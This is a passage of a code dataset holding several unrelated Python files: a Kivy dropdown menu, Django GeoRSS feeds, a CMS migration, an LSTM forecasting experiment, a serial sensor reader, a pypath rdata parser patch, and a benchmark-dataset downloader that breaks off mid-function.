hor_growth = \"left\"\n self.target_width = (\n self._start_coords[0] - self.border_margin\n )\n\n if ver_growth == \"down\":\n self.tar_y = self._start_coords[1] - self.target_height\n else: # should always be \"up\"\n self.tar_y = self._start_coords[1]\n\n if hor_growth == \"right\":\n self.tar_x = self._start_coords[0]\n else: # should always be \"left\"\n self.tar_x = self._start_coords[0] - self.target_width\n self._calculate_complete = True\n\n def open(self):\n\n def _open(interval):\n if not self._calculate_complete:\n return\n if self.position == \"auto\":\n self.ids.md_menu.pos = self._start_coords\n anim = Animation(\n x=self.tar_x,\n y=self.tar_y,\n width=self.target_width,\n height=self.target_height,\n duration=self.opening_time,\n opacity=1,\n transition=self.opening_transition,\n )\n anim.start(self.ids.md_menu)\n else:\n if self.position == \"center\":\n self.ids.md_menu.pos = (\n self._start_coords[0] - self.target_width / 2,\n self._start_coords[1] - self.target_height / 2,\n )\n elif self.position == \"bottom\":\n self.ids.md_menu.pos = (\n self._start_coords[0] - self.target_width / 2,\n self.caller.pos[1] - self.target_height,\n )\n anim = Animation(\n width=self.target_width,\n height=self.target_height,\n duration=self.opening_time,\n opacity=1,\n transition=self.opening_transition,\n )\n anim.start(self.ids.md_menu)\n Window.add_widget(self)\n Clock.unschedule(_open)\n self._calculate_process = False\n\n self.set_menu_properties()\n if not self._calculate_process:\n self._calculate_process = True\n Clock.schedule_interval(_open, 0)\n\n def on_touch_down(self, touch):\n if not self.ids.md_menu.collide_point(*touch.pos):\n self.dispatch(\"on_dismiss\")\n return True\n super().on_touch_down(touch)\n return True\n\n def on_touch_move(self, touch):\n super().on_touch_move(touch)\n return True\n\n def on_touch_up(self, touch):\n super().on_touch_up(touch)\n return True\n\n def on_enter(self, instance):\n \"\"\"Call when mouse enter the bbox of the item of menu.\"\"\"\n\n def on_leave(self, instance):\n \"\"\"Call when the mouse exit the item of menu.\"\"\"\n\n def on_release(self, *args):\n \"\"\"The method that will be called when you click menu items.\"\"\"\n\n def on_dismiss(self):\n Window.remove_widget(self)\n self.ids.md_menu.width = 0\n self.ids.md_menu.height = 0\n self.ids.md_menu.opacity = 0\n\n def dismiss(self):\n self.on_dismiss()\n\n def create_menu_items(self):\n for data in self.items:\n if data.get(\"icon\") and data.get(\"right_content_cls\", None):\n item = DropdownMenuItemIcon(\n text=data.get(\"text\", \"\"),\n divider=data.get(\"divider\", \"Full\"),\n _txt_top_pad=data.get(\"top_pad\", \"20dp\"),\n _txt_bot_pad=data.get(\"bot_pad\", \"20dp\"),\n )\n elif data.get(\"icon\"):\n item = DropdownMenuItemIcon(\n text=data.get(\"text\", \"\"),\n divider=data.get(\"divider\", \"Full\"),\n _txt_top_pad=data.get(\"top_pad\", \"20dp\"),\n _txt_bot_pad=data.get(\"bot_pad\", \"20dp\"),\n )\n elif data.get(\"right_content_cls\", None):\n item = DropdownMenuItemRight(\n text=data.get(\"text\", \"\"),\n divider=data.get(\"divider\", \"Full\"),\n _txt_top_pad=data.get(\"top_pad\", \"20dp\"),\n _txt_bot_pad=data.get(\"bot_pad\", \"20dp\"),\n )\n else:\n item = DropdownMenuItem(\n text=data.get(\"text\", \"\"),\n divider=data.get(\"divider\", \"Full\"),\n _txt_top_pad=data.get(\"top_pad\", \"20dp\"),\n _txt_bot_pad=data.get(\"bot_pad\", \"20dp\"),\n )\n if data.get(\"height\", \"\"):\n item.height = data.get(\"height\")\n if not data.get(\"icon\"):\n item._txt_left_pad = data.get(\"left_pad\", \"32dp\")\n else:\n item.icon = data.get(\"icon\", \"\")\n item.bind(on_release=lambda x=item: self.dispatch(\"on_release\", x))\n right_content_cls = data.get(\"right_content_cls\", None)\n if isinstance(right_content_cls, DropdownRightContent):\n item.ids._right_container.width = right_content_cls.width + dp(20)\n item.ids._right_container.padding = (\"10dp\", 0, 0, 0)\n item.add_widget(right_content_cls)\n else:\n if \"_right_container\" in item.ids:\n item.ids._right_container.width = 0\n for c in item.canvas.children:\n if isinstance(c, Line):\n item.canvas.remove(c)\n # if data.get('icon_pack') and data.get(\"icon\"):\n # item.ids.icon_widget.ids.lbl_txt.icon = 'ab-testing' # small hack to overcome canvas rule of the MDIcon\n # item.ids.icon_widget.ids.lbl_txt.text = webfont.make_icon(data.get(\"icon\"), data.get('icon_pack'))\n # item.ids.icon_widget.ids.lbl_txt.font_style = data.get('icon_pack')\n self.ids.md_menu.ids.box.add_widget(item)\n\n\nclass CustomFloatingActionButtonSpeedDial(ThemableBehavior, FloatLayout):\n callback = ObjectProperty(lambda x: None)\n data = ListProperty()\n width_mult = NumericProperty(5)\n state = OptionProperty(\"close\", options=(\"close\", \"open\"))\n menu = None\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.register_event_type(\"on_open\")\n self.register_event_type(\"on_close\")\n\n def on_open(self, *args):\n pass\n\n def on_close(self, *args):\n pass\n\n def on_menu_item_clicked(self, menu_inst, item_inst):\n self.close_stack()\n if self.callback:\n self.callback(item_inst)\n\n def on_data(self, instance, value):\n menu_items = []\n for menu_item in value:\n itm = {\n \"icon\": menu_item[0],\n \"text\": menu_item[1],\n \"viewclass\": \"OneLineListItem\",\n }\n if len(menu_item) > 2:\n itm['icon_pack'] = menu_item[2]\n menu_items.append(itm)\n self.menu = BaseDropdownMenu(\n caller=screen.main_window().ids.dropdown_menu_placeholder,\n width_mult=self.width_mult,\n items=menu_items,\n opening_time=0,\n ver_growth=\"down\",\n hor_growth=\"left\",\n position=\"auto\",\n )\n self.menu.bind(on_release=self.on_menu_item_clicked)\n\n def open_stack(self):\n self.menu.open()\n self.state = \"open\"\n self.dispatch(\"on_open\")\n\n def close_stack(self):\n self.menu.dismiss()\n self.state = \"close\"\n self.dispatch(\"on_close\")\n\n def drop_stack(self):\n self.menu.dismiss()\n self.state = \"close\"\n self.dispatch(\"on_close\")\n\n#------------------------------------------------------------------------------\n\nclass DropDownMenu(CustomFloatingActionButtonSpeedDial):\n pass\n","repo_name":"bitdust-io/p2p-app","sub_path":"src/components/drop_down_menu.py","file_name":"drop_down_menu.py","file_ext":"py","file_size_in_byte":15541,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"6296400585","text":"from django.contrib.syndication.views import Feed as BaseFeed\nfrom django.utils.feedgenerator import Atom1Feed, Rss201rev2Feed\n\n\nclass GeoFeedMixin:\n \"\"\"\n This mixin provides the necessary routines for SyndicationFeed subclasses\n to produce simple GeoRSS or W3C Geo elements.\n \"\"\"\n\n def georss_coords(self, coords):\n \"\"\"\n In GeoRSS coordinate pairs are ordered by lat/lon and separated by\n a single white space. Given a tuple of coordinates, return a string\n GeoRSS representation.\n \"\"\"\n return \" \".join(\"%f %f\" % (coord[1], coord[0]) for coord in coords)\n\n def add_georss_point(self, handler, coords, w3c_geo=False):\n \"\"\"\n Adds a GeoRSS point with the given coords using the given handler.\n Handles the differences between simple GeoRSS and the more popular\n W3C Geo specification.\n \"\"\"\n if w3c_geo:\n lon, lat = coords[:2]\n handler.addQuickElement(\"geo:lat\", \"%f\" % lat)\n handler.addQuickElement(\"geo:lon\", \"%f\" % lon)\n else:\n handler.addQuickElement(\"georss:point\", self.georss_coords((coords,)))\n\n def add_georss_element(self, handler, item, w3c_geo=False):\n \"\"\"Add a GeoRSS XML element using the given item and handler.\"\"\"\n # Getting the Geometry object.\n geom = item.get(\"geometry\")\n if geom is not None:\n if isinstance(geom, (list, tuple)):\n # Special case if a tuple/list was passed in. The tuple may be\n # a point or a box\n box_coords = None\n if isinstance(geom[0], (list, tuple)):\n # Box: ( (X0, Y0), (X1, Y1) )\n if len(geom) == 2:\n box_coords = geom\n else:\n raise ValueError(\"Only should be two sets of coordinates.\")\n else:\n if len(geom) == 2:\n # Point: (X, Y)\n self.add_georss_point(handler, geom, w3c_geo=w3c_geo)\n elif len(geom) == 4:\n # Box: (X0, Y0, X1, Y1)\n box_coords = (geom[:2], geom[2:])\n else:\n raise ValueError(\"Only should be 2 or 4 numeric elements.\")\n # If a GeoRSS box was given via tuple.\n if box_coords is not None:\n if w3c_geo:\n raise ValueError(\n \"Cannot use simple GeoRSS box in W3C Geo feeds.\"\n )\n handler.addQuickElement(\n \"georss:box\", self.georss_coords(box_coords)\n )\n else:\n # Getting the lowercase geometry type.\n gtype = str(geom.geom_type).lower()\n if gtype == \"point\":\n self.add_georss_point(handler, geom.coords, w3c_geo=w3c_geo)\n else:\n if w3c_geo:\n raise ValueError(\"W3C Geo only supports Point geometries.\")\n # For formatting consistent w/the GeoRSS simple standard:\n # http://georss.org/1.0#simple\n if gtype in (\"linestring\", \"linearring\"):\n handler.addQuickElement(\n \"georss:line\", self.georss_coords(geom.coords)\n )\n elif gtype in (\"polygon\",):\n # Only support the exterior ring.\n handler.addQuickElement(\n \"georss:polygon\", self.georss_coords(geom[0].coords)\n )\n else:\n raise ValueError(\n 'Geometry type \"%s\" not supported.' % geom.geom_type\n )\n\n\n# ### SyndicationFeed subclasses ###\nclass GeoRSSFeed(Rss201rev2Feed, GeoFeedMixin):\n def rss_attributes(self):\n attrs = super().rss_attributes()\n attrs[\"xmlns:georss\"] = \"http://www.georss.org/georss\"\n return attrs\n\n def add_item_elements(self, handler, item):\n super().add_item_elements(handler, item)\n self.add_georss_element(handler, item)\n\n def add_root_elements(self, handler):\n super().add_root_elements(handler)\n self.add_georss_element(handler, self.feed)\n\n\nclass GeoAtom1Feed(Atom1Feed, GeoFeedMixin):\n def root_attributes(self):\n attrs = super().root_attributes()\n attrs[\"xmlns:georss\"] = \"http://www.georss.org/georss\"\n return attrs\n\n def add_item_elements(self, handler, item):\n super().add_item_elements(handler, item)\n self.add_georss_element(handler, item)\n\n def add_root_elements(self, handler):\n super().add_root_elements(handler)\n self.add_georss_element(handler, self.feed)\n\n\nclass W3CGeoFeed(Rss201rev2Feed, GeoFeedMixin):\n def rss_attributes(self):\n attrs = super().rss_attributes()\n attrs[\"xmlns:geo\"] = \"http://www.w3.org/2003/01/geo/wgs84_pos#\"\n return attrs\n\n def add_item_elements(self, handler, item):\n super().add_item_elements(handler, item)\n self.add_georss_element(handler, item, w3c_geo=True)\n\n def add_root_elements(self, handler):\n super().add_root_elements(handler)\n self.add_georss_element(handler, self.feed, w3c_geo=True)\n\n\n# ### Feed subclass ###\nclass Feed(BaseFeed):\n \"\"\"\n This is a subclass of the `Feed` from `django.contrib.syndication`.\n This allows users to define a `geometry(obj)` and/or `item_geometry(item)`\n methods on their own subclasses so that geo-referenced information may\n placed in the feed.\n \"\"\"\n\n feed_type = GeoRSSFeed\n\n def feed_extra_kwargs(self, obj):\n return {\"geometry\": self._get_dynamic_attr(\"geometry\", obj)}\n\n def item_extra_kwargs(self, item):\n return {\"geometry\": self._get_dynamic_attr(\"item_geometry\", item)}\n","repo_name":"django/django","sub_path":"django/contrib/gis/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"71265125867","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shoop_simple_cms', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='page',\n name='created_by',\n field=models.ForeignKey(related_name='+', to=settings.AUTH_USER_MODEL, null=True, blank=True, on_delete=django.db.models.deletion.SET_NULL),\n ),\n migrations.AlterField(\n model_name='page',\n name='modified_by',\n field=models.ForeignKey(related_name='+', to=settings.AUTH_USER_MODEL, null=True, blank=True, on_delete=django.db.models.deletion.SET_NULL),\n ),\n ]\n","repo_name":"if413019/ShoopDevelopment","sub_path":"shoop/simple_cms/migrations/0002_fk_on_delete.py","file_name":"0002_fk_on_delete.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10344261476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 25 17:27:43 2020\n\n@author: Administrator\n\"\"\"\nimport numpy\nimport torch\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import *\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\nimport time\n\nfrom sklearn import preprocessing\n\ntime_start = time.time()\n\nBATCH_SIZE = 5\nLR = 0.001\nEPOCH = 10\nNUM_LAYERS = 3\nHIDDEN_SIZE = 128\n\n# df = pd.read_csv('HMWSmall.csv')\n# df = pd.read_csv('dataset2.csv')\ndf = pd.read_csv('海门湾label=4.csv')\n# df = pd.read_csv('海门湾label=4.csv')\n# rowdata1 = np.array(df.fillna(0))\n\nrowdata1 = np.array(df.fillna(method='ffill', inplace=False))\n\n\n# df = df.fillna(method='ffill',inplace = False)\n# rowdata = np.array(df)\n# 特征归一化\ndef minmaxscale(data: np.ndarray):\n seq_len, num_features = data.shape\n for i in range(num_features):\n min = data[:, i].min()\n max = data[:, i].max()\n data[:, i] = (data[:, i] - min) / (max - min)\n print(\"最小最大值\")\n print(min, max, (max - min))\n return data\n\n\ndef minmax(data: np.ndarray):\n min = data[:].min()\n max = data[:].max()\n # data[:] = (data[:] - min) / (max - min)\n print(\"最小最大值\")\n print(min, max, (max - min))\n\n\ntrainsize = int(0.8 * 13128)\nrowdata1 = minmaxscale(rowdata1)\n# # true_label = rowdata1[0:trainsize, 4]]\n# train = rowdata1[0:trainsize, 4]\n# minmax(train)\ntrain_data = torch.FloatTensor(rowdata1[0:trainsize, 0:4])\ntrain_label = torch.FloatTensor(rowdata1[0:trainsize, 4])\n\ntest_data = torch.FloatTensor(rowdata1[trainsize:, 0:4])\ntest_label = torch.FloatTensor(rowdata1[trainsize:, 4])\n\ndataset = torch.utils.data.TensorDataset(train_data, train_label)\ntrain_loader = torch.utils.data.DataLoader(dataset=dataset, batch_size=BATCH_SIZE, shuffle=True)\n\n\nclass Model(torch.nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.feat_embed = torch.nn.Linear(1, HIDDEN_SIZE) # 全连接层 1为 输入二维张量的为1 HIDDEN_SIZE 为输出大小 全连接层的神经元个数。\n\n self.hidlay = torch.nn.LSTM(input_size=HIDDEN_SIZE, hidden_size=HIDDEN_SIZE, num_layers=NUM_LAYERS,\n batch_first=True)\n\n # try rnn model\n # self.hidlay = torch.nn.RNN(input_size=HIDDEN_SIZE, hidden_size=HIDDEN_SIZE, num_layers=NUM_LAYERS,\n # batch_first=True)\n\n # try GRU model\n # self.hidlay = torch.nn.GRU(input_size=HIDDEN_SIZE, hidden_size=HIDDEN_SIZE, num_layers=NUM_LAYERS,\n # batch_first=True)\n\n self.outlay = torch.nn.Linear(HIDDEN_SIZE, 1)\n\n def forward(self, x):\n x = self.feat_embed(x)\n r_out, (h_n, h_c) = self.hidlay(x, None) # this is for LSTM model\n # r_out, h_n = self.hidlay(x, None) # this is for RNN model\n # r_out, h_n = self.hidlay(x, None) # this is for GRU model\n out = self.outlay(r_out[:, -1, :]) # 获取最后一个时间步输出\n return out\n\n\nmod = Model()\nprint(\"mode\")\nprint(mod)\n\noptimizer = torch.optim.Adam(mod.parameters(), lr=LR)\nloss_func = torch.nn.MSELoss()\nfor epoch in range(EPOCH):\n for step, (b_x, b_y) in enumerate(train_loader):\n b_x = b_x.view(-1, 4, 1)\n output = mod(b_x)\n b_y = torch.unsqueeze(b_y, dim=1)\n # print(\"时间步维度\",output.size())\n loss = loss_func(output, b_y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step % 10 == 0:\n print('EPOCH:', epoch, 'train loss: %.4f' % loss.data.numpy())\n\n\ndef nrmse(y_pred, y_true):\n \"\"\" Normalized RMSE\"\"\"\n t1 = np.sum((y_pred - y_true) ** 2) / np.size(y_true)\n t2 = np.sum(abs(y_true)) / np.size(y_true)\n return np.sqrt(t1) / t2\n\n\ndef R(Pred, Label):\n SStot = np.sum((Label - np.mean(Pred)) ** 2)\n SSres = np.sum((Label - Pred) ** 2)\n r2 = 1 - SSres / SStot\n return r2\n\n\noptimizer.zero_grad()\n\n# result = mod(test_data.view(-1, 4, 1)) * 13.95 + 0.8 # 反归一化\nresult = mod(test_data.view(-1, 4, 1)) * 14.95+0.05-4\n# mean = result.mean()\n# test_label = torch.unsqueeze(test_label, dim=1) * 13.95 + 0.8\ntest_label = torch.unsqueeze(test_label, dim=1) * 14.95+0.05\n# result = result[-2000:,:]\n# test_label = test_label[-2000:,:]\n# loss_test1 = loss_func(result, test_label).detach().numpy()\na = result.detach().numpy() # 预测值\nb = test_label.detach().numpy()\n# print(\"对比值\", b.shape)\n# print(a[-100:])\n# print(\"-------------------\")\n# print(b[-100:])\n# a = a[-100:]\n# print(\"预测结果100 A\", a)\n# b = b[-100:]\n# numpy.savetxt(\"对比实验GRU.csv\", b)\n# print(\"预测结果100 B\", b)\n# plt.figure(figsize=(24, 4))\nplt.plot(b[-100:], label=\"true\")\nplt.plot(a[-100:], label=\"pre\")\nplt.legend()\nplt.show()\n# loss_test1 = mean_absolute_error(a, b)\nloss_test1 = mean_absolute_error(a, b)\nloss_test2 = mean_squared_error(a, b)\nloss_test3 = np.sqrt(loss_test2)\nloss_test4 = nrmse(a, b)\nr = R(a, b)\n# loss_mean = loss_func(mean, test_label)\ntime_end = time.time()\ntime_consumption = time_end - time_start\nprint('mae:%.2f' % loss_test1, 'mse:%.2f' % loss_test2, 'rmse:%.2f' % loss_test3, 'nrmse: %.2f' % loss_test4,\n 'R: %.2f' % r,\n '\\ntime consumption:%.2f' % time_consumption)\n\n# xxx = np.array(pd.read_csv('xxx.csv'))\n# # xxx[:,0] = (xxx[:,0]-16.7)/5.2\n# # xxx[:,1] = (xxx[:,1]-7.05)/1.05\n# # xxx[:,2] = (xxx[:,2]-141)/5219\n# # xxx[:,3] = (xxx[:,3]-1)/499\n#\n# zzz = np.array(pd.read_csv('zzz.csv'))\n# zzzhat = np.array(pd.read_csv('zzzhat.csv'))\n#\n# xx = torch.FloatTensor(xxx)\n# zz = mod(xx.view(-1, 4, 1))\n# zz = zz.detach().numpy() * 10.68\n# plt.figure(2)\n# plt.plot(zz, color='#1ABC9C', label='FC-LSTM')\n# plt.plot(zzz, color='#616A6B', label='Target')\n# plt.plot(zzzhat, color='#F1948A', label='FM-GRU')\n# plt.xlabel('time step')\n# plt.ylabel('value')\n# plt.legend()\n# plt.show()\n# zzloss = mean_squared_error(zz, zzzhat)\n# print(zzloss)\n","repo_name":"Enki-Zhang/KFLSTM","sub_path":"LSTM对比实验.py","file_name":"LSTM对比实验.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32838245825","text":"from tinydb import TinyDB\nfrom tinydb import Query\nfrom timekeeper import Timestamps\nimport sys\nimport glob\nimport time\nimport serial\nimport json\n\nDEBUG = True\n\ndef main():\n try:\n port = serial.Serial('COM3', 115200, timeout=1)\n except:\n port = serial.Serial('/dev/tty.usbserial-0001', 115200, timeout=1)\n time.sleep(2)\n ts = Timestamps()\n while True:\n line = port.readline()\n try:\n line = line.decode()\n except Exception as e:\n print(e)\n print(line)\n if 'node_id' in line:\n try:\n data = json.loads(line)\n data['timestamp'] = ts.get_timestamp()\n print('')\n print(data)\n for key, value in data.items():\n print(key, ':', value)\n except Exception as e:\n print(e)\n elif DEBUG:\n print(line)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Remote-Area-Monitoring/Remote-Area-Monitoring","sub_path":"source/prototype/python_aggregator/proto_all_sensors.py","file_name":"proto_all_sensors.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40981809253","text":"from django.db import models\nfrom cms.models import CMSPlugin\nfrom django.utils.translation import ugettext_lazy as _\n\nclass Geo(models.Model):\n title = models.CharField(max_length=100, verbose_name=_('Title'))\n description = models.TextField(blank=True, null=True, verbose_name=_('Description'))\n pos = models.CharField(max_length=100, verbose_name=_('Pos'))\n\n class Meta:\n verbose_name = _('Geo')\n verbose_name_plural = _('Geo')\n\n def __unicode__(self):\n return unicode(self.title)","repo_name":"markrv/dj_app_geo","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70278600749","text":"import rdata\nimport numpy as np\n\n\ndef _rdata_data_frame_get_rownames(robj):\n\n for i, attr in enumerate(robj.attributes.value):\n\n if (\n attr.value and\n attr.value[1] and (\n (\n hasattr(attr.value[1], 'tag') and\n attr.value[1].tag and (\n (\n attr.value[1].tag.referenced_object and\n attr.value[1].tag.referenced_object.value and\n attr.value[1].tag.referenced_object.value.\\\n value == b'row.names'\n ) or (\n attr.value[1].tag.value and\n attr.value[1].tag.value.value == b'row.names'\n )\n )\n ) or (\n attr.value[1].tag and\n attr.value[1].tag.referenced_object and\n attr.value[1].tag.referenced_object.value and (\n attr.value[1].tag.referenced_object.value.value ==\n b'row.names'\n )\n ) or (\n attr.value[1].tag and\n attr.value[1].tag.value and\n attr.value[1].tag.value.value == b'row.names'\n )\n )\n ):\n\n break\n\n rownames = (\n attr.value[1].value[0].value\n if attr.value[0].value[0].value == b'data.frame' else\n attr.value[0].value\n if (\n attr.value[1].value[0].value[0].value ==\n b'data.frame'\n ) else\n []\n )\n\n return [rn.value.decode('utf-8') for rn in rownames]\n\n\ndef _rdata_list_get_names(robj):\n\n return [\n item.value.decode('utf-8')\n for item in robj.attributes.value[0].value\n ]\n\n\ndef _patch_rdata():\n\n def parse_R_object(self, reference_list=None):\n \"\"\"\n Parse a R object.\n \"\"\"\n\n if reference_list is None:\n # Index is 1-based, so we insert a dummy object\n reference_list = [None]\n\n info_int = self.parse_int()\n\n info = rdata.parser._parser.parse_r_object_info(info_int)\n\n tag = None\n attributes = None\n referenced_object = None\n\n tag_read = False\n attributes_read = False\n add_reference = False\n\n if info.type == rdata.parser._parser.RObjectType.SYM:\n # Read Char\n value = self.parse_R_object(reference_list)\n # Symbols can be referenced\n add_reference = True\n\n elif info.type in [\n rdata.parser._parser.RObjectType.LIST,\n rdata.parser._parser.RObjectType.LANG\n ]:\n\n tag = None\n if info.attributes:\n raise NotImplementedError('Attributes not suported for LIST')\n elif info.tag:\n tag = self.parse_R_object(reference_list)\n tag_read = True\n\n # Read CAR and CDR\n car = self.parse_R_object(reference_list)\n cdr = self.parse_R_object(reference_list)\n value = (car, cdr)\n\n elif info.type == rdata.parser._parser.RObjectType.CHAR:\n\n length = self.parse_int()\n if length > 0:\n value = self.parse_string(length=length)\n else:\n value = b''\n\n elif info.type == rdata.parser._parser.RObjectType.LGL:\n\n length = self.parse_int()\n\n value = np.empty(length, dtype=rdata.parser._parser.np.bool_)\n\n for i in range(length):\n value[i] = self.parse_bool()\n\n elif info.type == rdata.parser._parser.RObjectType.INT:\n length = self.parse_int()\n\n value = rdata.parser._parser.np.empty(\n length,\n dtype=rdata.parser._parser.np.int64\n )\n\n for i in range(length):\n value[i] = self.parse_int()\n\n elif info.type == rdata.parser._parser.RObjectType.REAL:\n length = self.parse_int()\n\n value = np.empty(length, dtype=rdata.parser._parser.np.double)\n\n for i in range(length):\n value[i] = self.parse_double()\n\n elif info.type == rdata.parser._parser.RObjectType.CPLX:\n length = self.parse_int()\n\n value = np.empty(length, dtype=rdata.parser._parser.np.complex_)\n\n for i in range(length):\n value[i] = self.parse_complex()\n\n elif info.type in [\n rdata.parser._parser.RObjectType.STR,\n rdata.parser._parser.RObjectType.VEC,\n rdata.parser._parser.RObjectType.EXPR\n ]:\n length = self.parse_int()\n\n value = [None] * length\n\n for i in range(length):\n value[i] = self.parse_R_object(reference_list)\n\n elif info.type == rdata.parser._parser.RObjectType.NILVALUE:\n value = None\n\n elif info.type == rdata.parser._parser.RObjectType.REF:\n value = None\n referenced_object = reference_list[info.reference]\n\n else:\n raise NotImplementedError(f'Type {info.type} not implemented')\n\n if info.tag and not tag_read:\n rdata.parser._parser.warnings.warn(\n f'Tag not implemented for type {info.type} and ignored'\n )\n if info.attributes and not attributes_read:\n attributes = self.parse_R_object(reference_list)\n\n result = rdata.parser._parser.RObject(\n info=info,\n tag=tag,\n attributes=attributes,\n value=value,\n referenced_object=referenced_object,\n )\n\n if add_reference:\n reference_list.append(result)\n\n return result\n\n rdata.parser._parser.Parser.parse_R_object = parse_R_object\n\n\n_patch_rdata()\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/rdata.py","file_name":"rdata.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"70116301868","text":"import argparse\nimport os\nimport re\nimport tarfile\nfrom zipfile import ZipFile\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\nimport gdown\nimport pandas as pd\nfrom six import remove_move\n\n\ndef download_and_extract(url, dst, remove=True):\n gdown.download(url, dst, quiet=False)\n\n if dst.endswith(\".tar.gz\"):\n tar = tarfile.open(dst, \"r:gz\")\n tar.extractall(os.path.dirname(dst))\n tar.close()\n\n if dst.endswith(\".tar\"):\n tar = tarfile.open(dst, \"r:\")\n tar.extractall(os.path.dirname(dst))\n tar.close()\n\n if dst.endswith(\".zip\"):\n zf = ZipFile(dst, \"r\")\n zf.extractall(os.path.dirname(dst))\n zf.close()\n\n if remove:\n os.remove(dst)\n\n\ndef download_datasets(data_path, datasets=['celeba', 'waterbirds', 'civilcomments', 'multinli']):\n os.makedirs(data_path, exist_ok=True)\n dataset_downloaders = {\n 'celeba': download_celeba,\n 'waterbirds': download_waterbirds,\n 'civilcomments': download_civilcomments,\n 'multinli': download_multinli,\n }\n for dataset in datasets:\n dataset_downloaders[dataset](data_path)\n\ndef download_civilcomments(data_path):\n logging.info(\"Downloading CivilComments\")\n civilcomments_dir = os.path.join(data_path, \"civilcomments\")\n os.makedirs(civilcomments_dir, exist_ok=True)\n download_and_extract(\n \"https://worksheets.codalab.org/rest/bundles/0x8cd3de0634154aeaad2ee6eb96723c6e/contents/blob/\",\n os.path.join(civilcomments_dir, \"civilcomments.tar.gz\"),\n )\n\ndef download_multinli(data_path):\n logging.info(\"Downloading MultiNLI\")\n multinli_dir = os.path.join(data_path, \"multinli\")\n glue_dir = os.path.join(multinli_dir, \"glue_data/MNLI/\")\n os.makedirs(glue_dir, exist_ok=True)\n multinli_tar = os.path.join(glue_dir, \"multinli_bert_features.tar.gz\")\n download_and_extract(\n \"https://nlp.stanford.edu/data/dro/multinli_bert_features.tar.gz\",\n multinli_tar,\n )\n os.makedirs(os.path.join(multinli_dir, \"data\"), exist_ok=True)\n download_and_extract(\n \"https://raw.githubusercontent.com/kohpangwei/group_DRO/master/dataset_metadata/multinli/metadata_random.csv\",\n os.path.join(multinli_dir, \"data\", \"metadata_random.csv\"),\n remove=False\n )\n\ndef download_waterbirds(data_path):\n logging.info(\"Downloading Waterbirds\")\n water_birds_dir = os.path.join(data_path, \"waterbirds\")\n os.makedirs(water_birds_dir, exist_ok=True)\n water_birds_dir_tar = os.path.join(water_birds_dir, \"waterbirds.tar.gz\")\n download_and_extract(\n \"https://nlp.stanford.edu/data/dro/waterbird_complete95_forest2water2.tar.gz\",\n water_birds_dir_tar,\n )\n\ndef download_celeba(data_path):\n logging.info(\"Downloading CelebA\")\n celeba_dir = os.path.join(data_path, \"celeba\")\n os.makedirs(celeba_dir, exist_ok=True)\n download_and_extract(\n \"https://drive.google.com/uc?id=1mb1R6dXfWbvk3DnlWOBO8pDeoBKOcLE6\",\n os.path.join(celeba_dir, \"img_align_celeba.zip\"),\n )\n download_and_extract(\n \"https://drive.google.com/uc?id=1acn0-nE4W7Wa17sIkKB0GtfW4Z41CMFB\",\n os.path.join(celeba_dir, \"list_eval_partition.txt\"),\n remove=False\n )\n download_and_extract(\n \"https://drive.google.com/uc?id=11um21kRUuaUNoMl59TCe2fb01FNjqNms\",\n os.path.join(celeba_dir, \"list_attr_celeba.txt\"),\n remove=False\n )\n\ndef generate_metadata(data_path, datasets=['celeba', 'waterbirds', 'civilcomments', 'multinli']):\n dataset_metadata_generators = {\n 'celeba': generate_metadata_celeba,\n 'waterbirds': generate_metadata_waterbirds,\n 'civilcomments': generate_metadata_civilcomments,\n 'multinli': generate_metadata_multinli,\n }\n for dataset in datasets:\n dataset_metadata_generators[dataset](data_path)\n\n\n\ndef generate_metadata_celeba(data_path):\n logging.info(\"Generating metadata for CelebA\")\n with open(os.path.join(data_path, \"celeba/list_eval_partition.txt\"), \"r\") as f:\n splits = f.readlines()\n\n with open(os.path.join(data_path, \"celeba/list_attr_celeba.txt\"), \"r\") as f:\n attrs = f.readlines()[2:]\n\n f = open(os.path.join(data_path, \"metadata_celeba.csv\"), \"w\")\n f.write(\"id,filename,split,y,a\\n\")\n\n for i, (split, attr) in enumerate(zip(splits, attrs)):\n fi, si = split.strip().split()\n ai = attr.strip().split()[1:]\n yi = 1 if ai[9] == \"1\" else 0\n gi = 1 if ai[20] == \"1\" else 0\n f.write(\"{},{},{},{},{}\\n\".format(i + 1, fi, si, yi, gi))\n\n f.close()\n\n\ndef generate_metadata_waterbirds(data_path):\n logging.info(\"Generating metadata for waterbirds\")\n df = pd.read_csv(os.path.join(data_path, \"waterbirds/waterbird_complete95_forest2water2/metadata.csv\"))\n df = df.rename(columns={\"img_id\": \"id\", \"img_filename\": \"filename\", \"place\": \"a\"})\n df[[\"id\", \"filename\", \"split\", \"y\", \"a\"]].to_csv(\n os.path.join(data_path, \"metadata_waterbirds.csv\"), index=False\n )\n\n\ndef 